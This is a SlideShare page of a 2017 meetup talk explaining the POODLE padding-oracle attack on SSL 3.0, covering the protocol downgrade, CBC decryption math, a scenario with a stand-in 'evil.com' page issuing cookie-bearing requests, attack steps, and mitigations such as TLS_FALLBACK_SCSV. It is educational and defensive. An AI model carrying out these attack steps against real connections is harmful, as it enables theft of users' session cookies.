SlideShare a Scribd company logo

Poodle

Download as PPTX, PDF
S
Samit Anwer

Null Meet Talk 18/3/2017

Engineering
1 of 11
POODLE This POODLE Bites: Exploiting The SSL 3.0 Fallback Bodo Möller, Thai Duong, Krzysztof Kotowicz Presented By: Samit Anwer
Padding Oracle On Downgraded Legacy Encryption • If attacker interferes with a handshake offering TLS 1.0 or later, clients will downgrade to SSL 3.0 • Encryption in SSL 3.0 uses either the RC4 stream cipher or a block cipher (AES/DES) in CBC mode • We will be taking a running example of AES in CBC mode of operation • Assumption: • the attacker can modify network transmissions between client and server
• Attacker sends link to victim (http://evil.com) • When victim visits the link, the Javascript embedded on evil.com starts making cookie bearing requests to https://example.com A HTTP request looks like: POST /path Cookie: name=value...rnrn body • The attacker can MITM the encrypted traffic and attacker controls data in “path” and “body”. Attack Scenario
POST /path Cookie: name=value...rnrnbody ‖ 20byte MAC ‖ padding C1 C2 Ci Cn-1 Cn P1 P2 Pi Pn-1 Pn Pi Pn P1 CiC1 Cn Ci = EK(Pi Ꚛ Ci-1) C0 = IV Cipher Block Chaining Encryption EnCt29642a9666ee9dbc8c0306acacb63bf8dcf2c554d9642a9666ee9dbc8c0306acae2n1AGm0vgFHgpMKrFgwdWAEF AES block size is 16 bytes DES block size is 8 bytes
Cipher Block Chaining Decryption Pi = DK(Ci) Ꚛ Ci-1 C0 = IV C1 CnCi P1 Pi Pn C1 C2 Ci Cn-1 Cn P1 P2 Pi Pn-1 Pn POST /path Cookie: name=value...rnrnbody ‖ 20byte MAC ‖ padding EnCt29642a9666ee9dbc8c0306acacb63bf8dcf2c554d9642a9666ee9dbc8c0306acae2n1AGm0vgFHgpMKrFgwdWAEF Back
POST /path Cookie: sessionid=value...rnrnbody ‖ 20byte MAC ‖ padding Padding of 1 to L bytes (where L is the block size in bytes) is added before performing blockwise CBC The attacker controls the request path & request body & hence can forge requests such that: 1. The padding fills an entire block (encrypted into Cn). 2. The cookie’s first (as of yet unknown) byte appears as the final byte in an earlier block (which gets encrypted into Ci). • The attacker replaces Cn by any earlier ciphertext block Ci • the ciphertext will be accepted if DK(Ci) ⊕ Cn-1 happens to have 15 as its final byte, • otherwise, it will be rejected  giving rise to a padding oracle attack The attack Ci Cn
Attack Contd. Assuming L=16 (AES) and ciphertext gets accepted: From (a): 15 = DK(Ci) [15] ⊕ Cn-1[15] , which can be written as => DK(Ci) [15] = 15 ⊕ Cn-1[15] --------- (1) We know: Pi = DK(Ci) ⊕ Ci-1 and hence Pi[15] = DK(Ci) [15] ⊕ Ci-1[15] --------- (2) By replacing DK(Ci) [15] from (1) in (2) we get Pi[15] = 15 ⊕ Cn-1[15] ⊕ Ci-1[15] Unknown entity Known entity C1 Cn /CiCn-1 P1 Pn-1 Pn From CBC decryption (here) we know: Pi = DK(Ci) Ꚛ Ci-1  Pn = DK(Cn) Ꚛ Cn-1  Pn[15] = DK(Cn)[15] Ꚛ Cn-1[15] ----- (a) C1 C2 Ci Cn-1 Cn/Ci DK(Cn /Ci)
Overall Effort • 256 SSL 3.0 requests per byte Recommendation • disabling the SSL 3.0 protocol in the client or in the server or both • TLS_FALLBACK_SCSV • when an incoming connection includes 0x56, 0x00 (TLS_FALLBACK_SCSV) in ClientHello.cipher_suites, compare ClientHello.client_version to the highest protocol version supported by the server. If the server supports a version higher than the one indicated by the client, reject the connection Problem with SSL 3.0 in CBC mode: The integrity of padding cannot be verified when decrypting as it is not covered by the MAC
Demo Overview src: https://patzke.org/implementing-the-poodle-attack.html
Attack Steps: • Degrade TLS protocol usage to SSLv3 by disruption of TLS handshake attempts. • Justify the URL and POST length such that the last block of the ciphertext is padding. • Perform the copy operation on every generated TLS packet and calculate the leaked byte if the server accepts the modified packet.
References • This POODLE Bites: Exploiting The SSL 3.0 Fallback Bodo Möller, Thai Duong, Krzysztof Kotowicz https://www.openssl.org/~bodo/ssl-poodle.pdf • Attack of the week: POODLE, https://blog.cryptographyengineering.com/2014/10/15/attack-of- week-poodle/ • Implementing the POODLE Attack, https://patzke.org/implementing-the-poodle-attack.html

Recommended

Bartosz Zaczyński (Grand Parade Poland) - WebSocket for Dummies
Bartosz Zaczyński (Grand Parade Poland) - WebSocket for DummiesBartosz Zaczyński (Grand Parade Poland) - WebSocket for Dummies
Bartosz Zaczyński (Grand Parade Poland) - WebSocket for DummiesBusiness Link Krakow
 
Hacking cryptography: 0xdec0de01 cryptoCTF solutions and a bit more - Владими...
Hacking cryptography: 0xdec0de01 cryptoCTF solutions and a bit more - Владими...Hacking cryptography: 0xdec0de01 cryptoCTF solutions and a bit more - Владими...
Hacking cryptography: 0xdec0de01 cryptoCTF solutions and a bit more - Владими...HackIT Ukraine
 
0xdec0de01 crypto CTF solutions
0xdec0de01 crypto CTF solutions0xdec0de01 crypto CTF solutions
0xdec0de01 crypto CTF solutionsVlad Garbuz
 
Fast HTTP string processing algorithms
Fast HTTP string processing algorithmsFast HTTP string processing algorithms
Fast HTTP string processing algorithmsAlexander Krizhanovsky
 
Packet flow on openstack
Packet flow on openstackPacket flow on openstack
Packet flow on openstackAchhar Kalia
 
Creating qmgr and allowing remote authorization
Creating qmgr and allowing remote authorizationCreating qmgr and allowing remote authorization
Creating qmgr and allowing remote authorizationRavi Babu
 
Secure LXC Networking
Secure LXC NetworkingSecure LXC Networking
Secure LXC NetworkingMarian Marinov
 
XoxzoテレフォニーAPI入門2017
XoxzoテレフォニーAPI入門2017XoxzoテレフォニーAPI入門2017
XoxzoテレフォニーAPI入門2017Xoxzo Inc.
 

Recommended

Bartosz Zaczyński (Grand Parade Poland) - WebSocket for Dummies
Bartosz Zaczyński (Grand Parade Poland) - WebSocket for DummiesBartosz Zaczyński (Grand Parade Poland) - WebSocket for Dummies
Bartosz Zaczyński (Grand Parade Poland) - WebSocket for DummiesBusiness Link Krakow
 
Hacking cryptography: 0xdec0de01 cryptoCTF solutions and a bit more - Владими...
Hacking cryptography: 0xdec0de01 cryptoCTF solutions and a bit more - Владими...Hacking cryptography: 0xdec0de01 cryptoCTF solutions and a bit more - Владими...
Hacking cryptography: 0xdec0de01 cryptoCTF solutions and a bit more - Владими...HackIT Ukraine
 
0xdec0de01 crypto CTF solutions
0xdec0de01 crypto CTF solutions0xdec0de01 crypto CTF solutions
0xdec0de01 crypto CTF solutionsVlad Garbuz
 
Fast HTTP string processing algorithms
Fast HTTP string processing algorithmsFast HTTP string processing algorithms
Fast HTTP string processing algorithmsAlexander Krizhanovsky
 
Packet flow on openstack
Packet flow on openstackPacket flow on openstack
Packet flow on openstackAchhar Kalia
 
Creating qmgr and allowing remote authorization
Creating qmgr and allowing remote authorizationCreating qmgr and allowing remote authorization
Creating qmgr and allowing remote authorizationRavi Babu
 
Secure LXC Networking
Secure LXC NetworkingSecure LXC Networking
Secure LXC NetworkingMarian Marinov
 
XoxzoテレフォニーAPI入門2017
XoxzoテレフォニーAPI入門2017XoxzoテレフォニーAPI入門2017
XoxzoテレフォニーAPI入門2017Xoxzo Inc.
 
Glomosim
GlomosimGlomosim
Glomosimbarodia_1437
 
初心者のためのPythonによるWebAPI活用方入門
初心者のためのPythonによるWebAPI活用方入門初心者のためのPythonによるWebAPI活用方入門
初心者のためのPythonによるWebAPI活用方入門Xoxzo Inc.
 
Zeromq anatomy & jeromq
Zeromq anatomy & jeromqZeromq anatomy & jeromq
Zeromq anatomy & jeromqDongmin Yu
 
Casper FFG Explained
Casper FFG ExplainedCasper FFG Explained
Casper FFG Explained상문 오
 
Geographically dispersed perconaxtra db cluster deployment
Geographically dispersed perconaxtra db cluster deploymentGeographically dispersed perconaxtra db cluster deployment
Geographically dispersed perconaxtra db cluster deploymentMarco Tusa
 
Glomosim introduction
Glomosim introductionGlomosim introduction
Glomosim introductionKathirvel Ayyaswamy
 
Nachos3 - Theoretical Part
Nachos3 - Theoretical PartNachos3 - Theoretical Part
Nachos3 - Theoretical PartEduardo Triana
 
2016-tcpkali-websocket
2016-tcpkali-websocket2016-tcpkali-websocket
2016-tcpkali-websocketLev Walkin
 
Non-DIY* Logging
Non-DIY* LoggingNon-DIY* Logging
Non-DIY* LoggingESUG
 
Blocks, procs && lambdas
Blocks, procs && lambdasBlocks, procs && lambdas
Blocks, procs && lambdasVidmantas Kabošis
 
Netcat - A Swiss Army Tool
Netcat - A Swiss Army ToolNetcat - A Swiss Army Tool
Netcat - A Swiss Army ToolChandrapal Badshah
 
Tcpsockets
TcpsocketsTcpsockets
Tcpsocketsmcjayaprasanna8
 
OSMC 2018 | Handling messages and notifications from software and gadgets wit...
OSMC 2018 | Handling messages and notifications from software and gadgets wit...OSMC 2018 | Handling messages and notifications from software and gadgets wit...
OSMC 2018 | Handling messages and notifications from software and gadgets wit...NETWAYS
 
Trip itparsing
Trip itparsingTrip itparsing
Trip itparsingCapIpad
 
Tcpdump
TcpdumpTcpdump
TcpdumpMohamed Gamel
 
SSL And TLS
SSL And TLS SSL And TLS
SSL And TLS Ghanshyam Patel
 
Nmap flags table
Nmap flags tableNmap flags table
Nmap flags tablehughpearse
 
S.Praveena,II-M.sc(Computer science),Bon Secours college for women,thanjavur
S.Praveena,II-M.sc(Computer science),Bon Secours college for women,thanjavurS.Praveena,II-M.sc(Computer science),Bon Secours college for women,thanjavur
S.Praveena,II-M.sc(Computer science),Bon Secours college for women,thanjavurpraveenaS25
 
Benchmarking for HTTP/2
Benchmarking for HTTP/2Benchmarking for HTTP/2
Benchmarking for HTTP/2Kit Chan
 
Netcat 101 by-mahesh-beema
Netcat 101 by-mahesh-beemaNetcat 101 by-mahesh-beema
Netcat 101 by-mahesh-beemaRaghunath G
 
Null Bangalore Meet 18/03/17
Null Bangalore Meet 18/03/17Null Bangalore Meet 18/03/17
Null Bangalore Meet 18/03/17Subash SN
 
Apache Struts2 CVE-2017-5638
Apache Struts2 CVE-2017-5638Apache Struts2 CVE-2017-5638
Apache Struts2 CVE-2017-5638Riyaz Walikar
 

More Related Content

What's hot

初心者のためのPythonによるWebAPI活用方入門
初心者のためのPythonによるWebAPI活用方入門初心者のためのPythonによるWebAPI活用方入門
初心者のためのPythonによるWebAPI活用方入門Xoxzo Inc.
 
Zeromq anatomy & jeromq
Zeromq anatomy & jeromqZeromq anatomy & jeromq
Zeromq anatomy & jeromqDongmin Yu
 
Casper FFG Explained
Casper FFG ExplainedCasper FFG Explained
Casper FFG Explained상문 오
 
Geographically dispersed perconaxtra db cluster deployment
Geographically dispersed perconaxtra db cluster deploymentGeographically dispersed perconaxtra db cluster deployment
Geographically dispersed perconaxtra db cluster deploymentMarco Tusa
 
Nachos3 - Theoretical Part
Nachos3 - Theoretical PartNachos3 - Theoretical Part
Nachos3 - Theoretical PartEduardo Triana
 
2016-tcpkali-websocket
2016-tcpkali-websocket2016-tcpkali-websocket
2016-tcpkali-websocketLev Walkin
 
Non-DIY* Logging
Non-DIY* LoggingNon-DIY* Logging
Non-DIY* LoggingESUG
 
OSMC 2018 | Handling messages and notifications from software and gadgets wit...
OSMC 2018 | Handling messages and notifications from software and gadgets wit...OSMC 2018 | Handling messages and notifications from software and gadgets wit...
OSMC 2018 | Handling messages and notifications from software and gadgets wit...NETWAYS
 
Trip itparsing
Trip itparsingTrip itparsing
Trip itparsingCapIpad
 
Nmap flags table
Nmap flags tableNmap flags table
Nmap flags tablehughpearse
 
S.Praveena,II-M.sc(Computer science),Bon Secours college for women,thanjavur
S.Praveena,II-M.sc(Computer science),Bon Secours college for women,thanjavurS.Praveena,II-M.sc(Computer science),Bon Secours college for women,thanjavur
S.Praveena,II-M.sc(Computer science),Bon Secours college for women,thanjavurpraveenaS25
 
Benchmarking for HTTP/2
Benchmarking for HTTP/2Benchmarking for HTTP/2
Benchmarking for HTTP/2Kit Chan
 
Netcat 101 by-mahesh-beema
Netcat 101 by-mahesh-beemaNetcat 101 by-mahesh-beema
Netcat 101 by-mahesh-beemaRaghunath G
 

What's hot (20)

Glomosim
GlomosimGlomosim
Glomosim
 
初心者のためのPythonによるWebAPI活用方入門
初心者のためのPythonによるWebAPI活用方入門初心者のためのPythonによるWebAPI活用方入門
初心者のためのPythonによるWebAPI活用方入門
 
Zeromq anatomy & jeromq
Zeromq anatomy & jeromqZeromq anatomy & jeromq
Zeromq anatomy & jeromq
 
Casper FFG Explained
Casper FFG ExplainedCasper FFG Explained
Casper FFG Explained
 
Geographically dispersed perconaxtra db cluster deployment
Geographically dispersed perconaxtra db cluster deploymentGeographically dispersed perconaxtra db cluster deployment
Geographically dispersed perconaxtra db cluster deployment
 
Glomosim introduction
Glomosim introductionGlomosim introduction
Glomosim introduction
 
Nachos3 - Theoretical Part
Nachos3 - Theoretical PartNachos3 - Theoretical Part
Nachos3 - Theoretical Part
 
2016-tcpkali-websocket
2016-tcpkali-websocket2016-tcpkali-websocket
2016-tcpkali-websocket
 
Non-DIY* Logging
Non-DIY* LoggingNon-DIY* Logging
Non-DIY* Logging
 
Blocks, procs && lambdas
Blocks, procs && lambdasBlocks, procs && lambdas
Blocks, procs && lambdas
 
Netcat - A Swiss Army Tool
Netcat - A Swiss Army ToolNetcat - A Swiss Army Tool
Netcat - A Swiss Army Tool
 
Tcpsockets
TcpsocketsTcpsockets
Tcpsockets
 
OSMC 2018 | Handling messages and notifications from software and gadgets wit...
OSMC 2018 | Handling messages and notifications from software and gadgets wit...OSMC 2018 | Handling messages and notifications from software and gadgets wit...
OSMC 2018 | Handling messages and notifications from software and gadgets wit...
 
Trip itparsing
Trip itparsingTrip itparsing
Trip itparsing
 
Tcpdump
TcpdumpTcpdump
Tcpdump
 
SSL And TLS
SSL And TLS SSL And TLS
SSL And TLS
 
Nmap flags table
Nmap flags tableNmap flags table
Nmap flags table
 
S.Praveena,II-M.sc(Computer science),Bon Secours college for women,thanjavur
S.Praveena,II-M.sc(Computer science),Bon Secours college for women,thanjavurS.Praveena,II-M.sc(Computer science),Bon Secours college for women,thanjavur
S.Praveena,II-M.sc(Computer science),Bon Secours college for women,thanjavur
 
Benchmarking for HTTP/2
Benchmarking for HTTP/2Benchmarking for HTTP/2
Benchmarking for HTTP/2
 
Netcat 101 by-mahesh-beema
Netcat 101 by-mahesh-beemaNetcat 101 by-mahesh-beema
Netcat 101 by-mahesh-beema
 

Viewers also liked

Null Bangalore Meet 18/03/17
Null Bangalore Meet 18/03/17Null Bangalore Meet 18/03/17
Null Bangalore Meet 18/03/17Subash SN
 
Apache Struts2 CVE-2017-5638
Apache Struts2 CVE-2017-5638Apache Struts2 CVE-2017-5638
Apache Struts2 CVE-2017-5638Riyaz Walikar
 
DataSploit - Tool Demo at Null Bangalore - March Meet.
DataSploit - Tool Demo at Null Bangalore - March Meet. DataSploit - Tool Demo at Null Bangalore - March Meet.
DataSploit - Tool Demo at Null Bangalore - March Meet. Shubham Mittal
 
How to Become a Thought Leader in Your Niche
How to Become a Thought Leader in Your NicheHow to Become a Thought Leader in Your Niche
How to Become a Thought Leader in Your NicheLeslie Samuel
 
Presentacion inclusion
Presentacion inclusionPresentacion inclusion
Presentacion inclusionJulio Jimenez
 
The theater of taormina
The theater of taorminaThe theater of taormina
The theater of taorminarobydellem
 
Build Dynamic DNS server from scratch in C (Part1)
Build Dynamic DNS server from scratch in C (Part1)Build Dynamic DNS server from scratch in C (Part1)
Build Dynamic DNS server from scratch in C (Part1)Yen-Kuan Wu
 
Gävle kopia
Gävle kopiaGävle kopia
Gävle kopiaEdwjen
 
Metasploit For Beginners
Metasploit For BeginnersMetasploit For Beginners
Metasploit For BeginnersRamnath Shenoy
 
La entrada de la cueva original
La entrada de la cueva originalLa entrada de la cueva original
La entrada de la cueva originalencararroyo
 
Null picture forensics using ghiro appliance
Null picture forensics using ghiro applianceNull picture forensics using ghiro appliance
Null picture forensics using ghiro applianceinvad3rsam
 
Exploiting a vulnerability to gain a shell
Exploiting a vulnerability to gain a shellExploiting a vulnerability to gain a shell
Exploiting a vulnerability to gain a shellAditya Kamat
 
Hostile Subdomain Takeover by Ankit Prateek
Hostile Subdomain Takeover by Ankit PrateekHostile Subdomain Takeover by Ankit Prateek
Hostile Subdomain Takeover by Ankit PrateekOWASP Delhi
 
2c esp8266 non-os_sdk_api_reference_en
2c esp8266 non-os_sdk_api_reference_en2c esp8266 non-os_sdk_api_reference_en
2c esp8266 non-os_sdk_api_reference_enle van hoa
 
Santa Barbara Polo & Racquet Club
Santa Barbara Polo & Racquet ClubSanta Barbara Polo & Racquet Club
Santa Barbara Polo & Racquet ClubFive Elements
 
Estabilidad Laboral
Estabilidad Laboral Estabilidad Laboral
Estabilidad Laboral miguel mendez
 

Viewers also liked (19)

Null Bangalore Meet 18/03/17
Null Bangalore Meet 18/03/17Null Bangalore Meet 18/03/17
Null Bangalore Meet 18/03/17
 
Apache Struts2 CVE-2017-5638
Apache Struts2 CVE-2017-5638Apache Struts2 CVE-2017-5638
Apache Struts2 CVE-2017-5638
 
DataSploit - Tool Demo at Null Bangalore - March Meet.
DataSploit - Tool Demo at Null Bangalore - March Meet. DataSploit - Tool Demo at Null Bangalore - March Meet.
DataSploit - Tool Demo at Null Bangalore - March Meet.
 
How to Become a Thought Leader in Your Niche
How to Become a Thought Leader in Your NicheHow to Become a Thought Leader in Your Niche
How to Become a Thought Leader in Your Niche
 
Role of Technology in Recruitment
Role of Technology in Recruitment Role of Technology in Recruitment
Role of Technology in Recruitment
 
Aprendizaje
AprendizajeAprendizaje
Aprendizaje
 
Presentacion inclusion
Presentacion inclusionPresentacion inclusion
Presentacion inclusion
 
The theater of taormina
The theater of taorminaThe theater of taormina
The theater of taormina
 
Build Dynamic DNS server from scratch in C (Part1)
Build Dynamic DNS server from scratch in C (Part1)Build Dynamic DNS server from scratch in C (Part1)
Build Dynamic DNS server from scratch in C (Part1)
 
Gävle kopia
Gävle kopiaGävle kopia
Gävle kopia
 
Owasp top 10
Owasp top 10 Owasp top 10
Owasp top 10
 
Metasploit For Beginners
Metasploit For BeginnersMetasploit For Beginners
Metasploit For Beginners
 
La entrada de la cueva original
La entrada de la cueva originalLa entrada de la cueva original
La entrada de la cueva original
 
Null picture forensics using ghiro appliance
Null picture forensics using ghiro applianceNull picture forensics using ghiro appliance
Null picture forensics using ghiro appliance
 
Exploiting a vulnerability to gain a shell
Exploiting a vulnerability to gain a shellExploiting a vulnerability to gain a shell
Exploiting a vulnerability to gain a shell
 
Hostile Subdomain Takeover by Ankit Prateek
Hostile Subdomain Takeover by Ankit PrateekHostile Subdomain Takeover by Ankit Prateek
Hostile Subdomain Takeover by Ankit Prateek
 
2c esp8266 non-os_sdk_api_reference_en
2c esp8266 non-os_sdk_api_reference_en2c esp8266 non-os_sdk_api_reference_en
2c esp8266 non-os_sdk_api_reference_en
 
Santa Barbara Polo & Racquet Club
Santa Barbara Polo & Racquet ClubSanta Barbara Polo & Racquet Club
Santa Barbara Polo & Racquet Club
 
Estabilidad Laboral
Estabilidad Laboral Estabilidad Laboral
Estabilidad Laboral
 

Similar to Poodle

TLS/SSL MAC security flaw
TLS/SSL MAC security flawTLS/SSL MAC security flaw
TLS/SSL MAC security flawNate Lawson
 
Technical Overview of QUIC
Technical Overview of QUICTechnical Overview of QUIC
Technical Overview of QUICshigeki_ohtsu
 
13_TCP_Attack.pptx
13_TCP_Attack.pptx13_TCP_Attack.pptx
13_TCP_Attack.pptxAlmaOraevi
 
Tcp congestion control
Tcp congestion controlTcp congestion control
Tcp congestion controlAbdo sayed
 
Tcp congestion control (1)
Tcp congestion control (1)Tcp congestion control (1)
Tcp congestion control (1)Abdo sayed
 
What every Java developer should know about network?
What every Java developer should know about network?What every Java developer should know about network?
What every Java developer should know about network?aragozin
 
Lecture 5
Lecture 5Lecture 5
Lecture 5ntpc08
 
4.1.1.10 Packet Tracer - Configuring Extended ACLs Scenario 1.pdf
4.1.1.10 Packet Tracer - Configuring Extended ACLs Scenario 1.pdf4.1.1.10 Packet Tracer - Configuring Extended ACLs Scenario 1.pdf
4.1.1.10 Packet Tracer - Configuring Extended ACLs Scenario 1.pdfssuserf7cd2b
 
4.1.1.10 packet tracer configuring extended ac ls scenario 1
4.1.1.10 packet tracer configuring extended ac ls scenario 14.1.1.10 packet tracer configuring extended ac ls scenario 1
4.1.1.10 packet tracer configuring extended ac ls scenario 1mps125
 
Troubleshooting TCP/IP
Troubleshooting TCP/IPTroubleshooting TCP/IP
Troubleshooting TCP/IPvijai s
 
KandR_TCP (1).ppt notes for congestion control
KandR_TCP (1).ppt notes for congestion controlKandR_TCP (1).ppt notes for congestion control
KandR_TCP (1).ppt notes for congestion controlGOKULKANNANMMECLECTC
 
Transport Layer in Computer Networks (TCP / UDP / SCTP)
Transport Layer in Computer Networks (TCP / UDP / SCTP)Transport Layer in Computer Networks (TCP / UDP / SCTP)
Transport Layer in Computer Networks (TCP / UDP / SCTP)Hamidreza Bolhasani
 
How (un)secure is SSL/TLS?
How (un)secure is SSL/TLS?How (un)secure is SSL/TLS?
How (un)secure is SSL/TLS?Microsoft
 
packet traveling (pre cloud)
packet traveling (pre cloud)packet traveling (pre cloud)
packet traveling (pre cloud)iman darabi
 
blockchain-and-trusted-computing
blockchain-and-trusted-computingblockchain-and-trusted-computing
blockchain-and-trusted-computingYongraeJo
 

Similar to Poodle (20)

TLS/SSL MAC security flaw
TLS/SSL MAC security flawTLS/SSL MAC security flaw
TLS/SSL MAC security flaw
 
NE #1.pptx
NE #1.pptxNE #1.pptx
NE #1.pptx
 
Technical Overview of QUIC
Technical Overview of QUICTechnical Overview of QUIC
Technical Overview of QUIC
 
13_TCP_Attack.pptx
13_TCP_Attack.pptx13_TCP_Attack.pptx
13_TCP_Attack.pptx
 
TCP_Congestion_Control.ppt
TCP_Congestion_Control.pptTCP_Congestion_Control.ppt
TCP_Congestion_Control.ppt
 
Tcp congestion avoidance
Tcp congestion avoidanceTcp congestion avoidance
Tcp congestion avoidance
 
Tcp congestion control
Tcp congestion controlTcp congestion control
Tcp congestion control
 
Tcp congestion control (1)
Tcp congestion control (1)Tcp congestion control (1)
Tcp congestion control (1)
 
What every Java developer should know about network?
What every Java developer should know about network?What every Java developer should know about network?
What every Java developer should know about network?
 
Lecture 5
Lecture 5Lecture 5
Lecture 5
 
4.1.1.10 Packet Tracer - Configuring Extended ACLs Scenario 1.pdf
4.1.1.10 Packet Tracer - Configuring Extended ACLs Scenario 1.pdf4.1.1.10 Packet Tracer - Configuring Extended ACLs Scenario 1.pdf
4.1.1.10 Packet Tracer - Configuring Extended ACLs Scenario 1.pdf
 
4.1.1.10 packet tracer configuring extended ac ls scenario 1
4.1.1.10 packet tracer configuring extended ac ls scenario 14.1.1.10 packet tracer configuring extended ac ls scenario 1
4.1.1.10 packet tracer configuring extended ac ls scenario 1
 
Troubleshooting TCP/IP
Troubleshooting TCP/IPTroubleshooting TCP/IP
Troubleshooting TCP/IP
 
KandR_TCP (1).ppt notes for congestion control
KandR_TCP (1).ppt notes for congestion controlKandR_TCP (1).ppt notes for congestion control
KandR_TCP (1).ppt notes for congestion control
 
Data Link Layer
Data Link LayerData Link Layer
Data Link Layer
 
Part5-tcp-improvements.pptx
Part5-tcp-improvements.pptxPart5-tcp-improvements.pptx
Part5-tcp-improvements.pptx
 
Transport Layer in Computer Networks (TCP / UDP / SCTP)
Transport Layer in Computer Networks (TCP / UDP / SCTP)Transport Layer in Computer Networks (TCP / UDP / SCTP)
Transport Layer in Computer Networks (TCP / UDP / SCTP)
 
How (un)secure is SSL/TLS?
How (un)secure is SSL/TLS?How (un)secure is SSL/TLS?
How (un)secure is SSL/TLS?
 
packet traveling (pre cloud)
packet traveling (pre cloud)packet traveling (pre cloud)
packet traveling (pre cloud)
 
blockchain-and-trusted-computing
blockchain-and-trusted-computingblockchain-and-trusted-computing
blockchain-and-trusted-computing
 

Recently uploaded

GDSC ASEB Gen AI study jams presentation
GDSC ASEB Gen AI study jams presentationGDSC ASEB Gen AI study jams presentation
GDSC ASEB Gen AI study jams presentationGDSCAESB
 
Processing & Properties of Floor and Wall Tiles.pptx
Processing & Properties of Floor and Wall Tiles.pptxProcessing & Properties of Floor and Wall Tiles.pptx
Processing & Properties of Floor and Wall Tiles.pptxpranjaldaimarysona
 
Current Transformer Drawing and GTP for MSETCL
Current Transformer Drawing and GTP for MSETCLCurrent Transformer Drawing and GTP for MSETCL
Current Transformer Drawing and GTP for MSETCLDeelipZope
 
ZXCTN 5804 / ZTE PTN / ZTE POTN / ZTE 5804 PTN / ZTE POTN 5804 ( 100/200 GE Z...
ZXCTN 5804 / ZTE PTN / ZTE POTN / ZTE 5804 PTN / ZTE POTN 5804 ( 100/200 GE Z...ZXCTN 5804 / ZTE PTN / ZTE POTN / ZTE 5804 PTN / ZTE POTN 5804 ( 100/200 GE Z...
ZXCTN 5804 / ZTE PTN / ZTE POTN / ZTE 5804 PTN / ZTE POTN 5804 ( 100/200 GE Z...ZTE
 
SPICE PARK APR2024 ( 6,793 SPICE Models )
SPICE PARK APR2024 ( 6,793 SPICE Models )SPICE PARK APR2024 ( 6,793 SPICE Models )
SPICE PARK APR2024 ( 6,793 SPICE Models )Tsuyoshi Horigome
 
HARDNESS, FRACTURE TOUGHNESS AND STRENGTH OF CERAMICS
HARDNESS, FRACTURE TOUGHNESS AND STRENGTH OF CERAMICSHARDNESS, FRACTURE TOUGHNESS AND STRENGTH OF CERAMICS
HARDNESS, FRACTURE TOUGHNESS AND STRENGTH OF CERAMICSRajkumarAkumalla
 
VIP Call Girls Service Kondapur Hyderabad Call +91-8250192130
VIP Call Girls Service Kondapur Hyderabad Call +91-8250192130VIP Call Girls Service Kondapur Hyderabad Call +91-8250192130
VIP Call Girls Service Kondapur Hyderabad Call +91-8250192130Suhani Kapoor
 
Biology for Computer Engineers Course Handout.pptx
Biology for Computer Engineers Course Handout.pptxBiology for Computer Engineers Course Handout.pptx
Biology for Computer Engineers Course Handout.pptxDeepakSakkari2
 
MANUFACTURING PROCESS-II UNIT-2 LATHE MACHINE
MANUFACTURING PROCESS-II UNIT-2 LATHE MACHINEMANUFACTURING PROCESS-II UNIT-2 LATHE MACHINE
MANUFACTURING PROCESS-II UNIT-2 LATHE MACHINESIVASHANKAR N
 
(MEERA) Dapodi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Escorts
(MEERA) Dapodi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Escorts(MEERA) Dapodi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Escorts
(MEERA) Dapodi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Escortsranjana rawat
 
Analog to Digital and Digital to Analog Converter
Analog to Digital and Digital to Analog ConverterAnalog to Digital and Digital to Analog Converter
Analog to Digital and Digital to Analog ConverterAbhinavSharma374939
 
Software Development Life Cycle By Team Orange (Dept. of Pharmacy)
Software Development Life Cycle By Team Orange (Dept. of Pharmacy)Software Development Life Cycle By Team Orange (Dept. of Pharmacy)
Software Development Life Cycle By Team Orange (Dept. of Pharmacy)Suman Mia
 
MANUFACTURING PROCESS-II UNIT-5 NC MACHINE TOOLS
MANUFACTURING PROCESS-II UNIT-5 NC MACHINE TOOLSMANUFACTURING PROCESS-II UNIT-5 NC MACHINE TOOLS
MANUFACTURING PROCESS-II UNIT-5 NC MACHINE TOOLSSIVASHANKAR N
 
Coefficient of Thermal Expansion and their Importance.pptx
Coefficient of Thermal Expansion and their Importance.pptxCoefficient of Thermal Expansion and their Importance.pptx
Coefficient of Thermal Expansion and their Importance.pptxAsutosh Ranjan
 
College Call Girls Nashik Nehal 7001305949 Independent Escort Service Nashik
College Call Girls Nashik Nehal 7001305949 Independent Escort Service NashikCollege Call Girls Nashik Nehal 7001305949 Independent Escort Service Nashik
College Call Girls Nashik Nehal 7001305949 Independent Escort Service NashikCall Girls in Nagpur High Profile
 
247267395-1-Symmetric-and-distributed-shared-memory-architectures-ppt (1).ppt
247267395-1-Symmetric-and-distributed-shared-memory-architectures-ppt (1).ppt247267395-1-Symmetric-and-distributed-shared-memory-architectures-ppt (1).ppt
247267395-1-Symmetric-and-distributed-shared-memory-architectures-ppt (1).pptssuser5c9d4b1
 
Structural Analysis and Design of Foundations: A Comprehensive Handbook for S...
Structural Analysis and Design of Foundations: A Comprehensive Handbook for S...Structural Analysis and Design of Foundations: A Comprehensive Handbook for S...
Structural Analysis and Design of Foundations: A Comprehensive Handbook for S...Dr.Costas Sachpazis
 

Recently uploaded (20)

GDSC ASEB Gen AI study jams presentation
GDSC ASEB Gen AI study jams presentationGDSC ASEB Gen AI study jams presentation
GDSC ASEB Gen AI study jams presentation
 
Processing & Properties of Floor and Wall Tiles.pptx
Processing & Properties of Floor and Wall Tiles.pptxProcessing & Properties of Floor and Wall Tiles.pptx
Processing & Properties of Floor and Wall Tiles.pptx
 
Current Transformer Drawing and GTP for MSETCL
Current Transformer Drawing and GTP for MSETCLCurrent Transformer Drawing and GTP for MSETCL
Current Transformer Drawing and GTP for MSETCL
 
Exploring_Network_Security_with_JA3_by_Rakesh Seal.pptx
Exploring_Network_Security_with_JA3_by_Rakesh Seal.pptxExploring_Network_Security_with_JA3_by_Rakesh Seal.pptx
Exploring_Network_Security_with_JA3_by_Rakesh Seal.pptx
 
ZXCTN 5804 / ZTE PTN / ZTE POTN / ZTE 5804 PTN / ZTE POTN 5804 ( 100/200 GE Z...
ZXCTN 5804 / ZTE PTN / ZTE POTN / ZTE 5804 PTN / ZTE POTN 5804 ( 100/200 GE Z...ZXCTN 5804 / ZTE PTN / ZTE POTN / ZTE 5804 PTN / ZTE POTN 5804 ( 100/200 GE Z...
ZXCTN 5804 / ZTE PTN / ZTE POTN / ZTE 5804 PTN / ZTE POTN 5804 ( 100/200 GE Z...
 
SPICE PARK APR2024 ( 6,793 SPICE Models )
